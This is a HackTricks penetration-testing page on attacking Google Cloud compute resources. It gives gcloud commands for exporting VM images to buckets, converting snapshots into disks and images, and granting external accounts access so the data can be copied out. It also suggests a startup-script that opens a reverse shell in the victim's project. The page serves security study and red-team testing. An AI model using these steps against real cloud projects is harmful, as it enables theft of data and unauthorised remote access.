Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about Compute and VPC (Networking) check:
{% content-ref url="../../gcp-pentesting/gcp-services/gcp-compute-instances-enum/" %} gcp-compute-instances-enum {% endcontent-ref %}
This would allow an attacker to access the data contained inside already existing images or create new images of running VMs and access their data without having access to the running VM.
It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
{% code overflow="wrap" %}
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally
{% endcode %}
Fore performing this action the attacker might need privileges over the storage bucket and for sure privileges over cloudbuild as it's the service which is going to be asked to perform the export
Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com
needs:
- roles/iam.serviceAccountTokenCreator
- roles/compute.admin
- roles/iam.serviceAccountUser
And the SA <project-id>-compute@developer.gserviceaccount.com
needs:
- oles/compute.storageAdmin
- roles/storage.objectAdmin
It's not possible to directly export snapshots and disks, but it's possible to transform a snapshot in a disk, a disk in an image and following the previous section, export that image to inspect it locally
{% code overflow="wrap" %}
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
{% endcode %}
With the goal of accessing the data stored in an image or inside a running VM from where an attacker has created an image, it possible to grant an external account access over the image:
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
and then create a new VM from it:
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
If you could not give your external account access over image, you could launch a VM using that image in the victims project and make the metadata execute a reverse shell to access the image adding the param:
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.
Or you could grant an external account access over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
Attach the disk to an instance:
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
Mount the disk inside the VM:
-
SSH into the VM:
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
-
Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as
/dev/sdb
,/dev/sdc
, etc. -
Format and Mount the Disk (if it's a new or raw disk):
-
Create a mount point:
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
-
Mount the disk:
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
-
If you cannot give access to a external project to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.